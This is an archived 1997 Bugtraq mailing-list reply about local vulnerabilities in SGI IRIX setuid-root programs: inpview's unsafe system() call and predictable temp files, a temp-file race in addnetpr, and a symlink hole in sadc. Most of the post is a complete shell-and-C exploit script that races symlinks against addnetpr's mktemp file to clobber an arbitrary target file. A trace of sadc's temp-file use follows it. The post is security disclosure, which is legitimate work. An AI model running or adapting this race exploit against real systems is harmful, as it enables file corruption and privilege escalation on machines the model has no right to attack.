Bugtraq mailing list archives
Re: Irix: misc
From: poison () COSMOS KAIST AC KR (Jaechul Choe)
Date: Fri, 9 May 1997 06:33:46 +0900
Wow, your works are so fertile and wonderful. Let me add some stuffs
1. /usr/lib/InPerson/inpview inpview is part of InPerson desktop video conferencing package. It's root-owned/suid and is written in a classic SGI suid-programming style, i.e. in the course of execution inpview, without dropping euid=0, starts program ttsession, using system() and without bothering to use absolute path. So it's pretty much like suid shell sitting around, in case you forget root password. It does all kinds of other dangerous stuff as well, e.g. predictable tmp files.
The template for one of the tmp files is "/var/tmp/ioAAAXXXXXX"
I was trying to write a script exploiting the race condition, last year
, but for some reason I couldn't know then, the race didn't run well and I
quitted soon.
There was the same race condition in the program, /usr/lib/addnetpr, another
suid root program for print.
Here is the exploit script for it.
But though I tried, it was hard to find the way to get root with it.
It can fill the target with the two argument of addnetpr, but with some
messages unable to control.
And it will prompt the window asking root passwd to non-privilegedd(not root,
but irix-specific privileged) users.
Privileged users bypass the window and can run the race.
Tested both IRIX 5.3 and 6.2
---------------)<-----------cut expnetpr.sh ---------------)<----------------
#!/bin/sh
PROG="`basename $0`"
if [ $# -ne 1 ]; then
echo "Usage: $PROG <target>"
exit 1
fi
cat > expnetpr.c << _CREDIT_TO_ZOMO_
void main(int argc, char *argv[])
{
char *template = "/var/tmp/printersXXXXXX";
char *target;
int pid;
target = (char *)mktemp(template);
if ((pid = fork()) > 0) {
sleep(3);
umask(0);
execl("/usr/lib/addnetpr", "addnetpr", "localhost","+", 0);
}
else
while(1) {
symlink(argv[1], target);
unlink(target);
}
}
_CREDIT_TO_ZOMO_
/bin/cc expnetpr.c -o expnetpr
if [ ! -f expnetpr ]; then
echo "Couldn't compile expnetpr.c, lame! \nMake sure that C compiler has
been installed from the IDO"
exit 1
fi
while(`true`)
do
./expnetpr $1&
PID=$!
sleep 15
ls -al $1
killall expnetpr
killall addnetpr
done
--------------------)<------------ cut ---------------)<-------------------
And one more, as addressed in [8lgm]-Advisory-11.UNIX.sadc.07-Jan-1992
and SGI security FAQ, there is a hole in /usr/lib/sa/sadc.
That's both on IRIX 5.3 and 6.2.
The tmp file to link to target is /tmp/sa_adrfl
(
114mS stat(/tmp/sa.adrfl, 0x10042dd8) errno = 2 (No such file or directory)
115mS umask(0) = 0
116mS open(/tmp/sa.adrfl, O_RDWR|O_CREAT|O_TRUNC, 0664) = 3
)
sadc is sgid sys in IRIX so the hole may be minor
but won't it be of help to get root in conjunction with another program?
I was surprised to find the hole still existed in IRIX 6.2 then
SGI might be indifferent enough
Current thread:
- Irix: misc Yuri Volobuev (May 07)
- Re: Irix: misc J.A. Gutierrez (May 08)
- Re: Irix: misc Jaechul Choe (May 08)
- SGI Security Advisory 19961203-02-PX - IRIX netprint Program SGI Security Coordinator (May 08)
- Bug Serious problem in NEC SOCKS server Trevor Schroeder (May 09)
- Re: Bug Serious problem in NEC SOCKS server Matt Bush (May 09)
- Windows 95/NT DoS myst (May 09)
- More buffer overrun crap -- Solaris 2.5.1 /usr/bin/ps Joe Zbiciak (May 10)
- Re: More buffer overrun crap -- Solaris 2.5.1 /usr/bin/ps kevin brintnall (May 10)
- Re: Windows 95/NT DoS Albert Siersema (May 10)
- Re: Windows 95/NT DoS DiGennaro (May 10)
- Re: Windows 95/NT DoS Alan Cox (May 11)
- OOB Quick Fix Aleph One (May 10)